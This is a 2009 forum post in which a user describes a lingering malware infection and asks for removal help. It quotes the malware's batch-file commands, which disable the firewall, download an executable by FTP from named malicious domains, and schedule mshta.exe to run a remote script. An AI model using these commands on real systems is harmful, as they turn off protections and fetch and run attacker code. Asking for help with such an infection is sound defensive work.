First post so hi all! I'm having some trouble with a nasty infection I picked up somehow. So far i've run Malwarebytes Anti-Malware and AVG to remove the bulk of the problem. But there's still something there that AVG picks up but can only deal with the symptom, not the cause.
At what looks like scheduled times a batch file is created with a random name like hjBk8WI.bat in c:\. The contents of this file are:
netsh firewall set opmode disable
ftp -s:c:\MaJcwy.txt zaebalisuki.com <--- other known malware domains are used as well as this one.
Looking at the MaJcwy.txt script that it gets the FTP instructions from it downloads an executable:
get calc.exe c:\eYVJcEi.exe
Another batch file is created at the same time, again with a random name, but this one contains a schedule to run mshta.exe:
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:05 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
at 00:22 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
The batch file is much bigger, this is just the first few lines of it.
When the executable file that was ftp'd in is run AVG picks it up and flags cmd.exe as a possible culprit. I've blocked port 21 to prevent it from making an FTP connection out to get this executable, but none of the scanners I have can pick up the culprit for all of this. Any help much appreciated!
Edited by garmanma, 16 June 2009 - 07:53 AM.
Disabled links to be on the safe side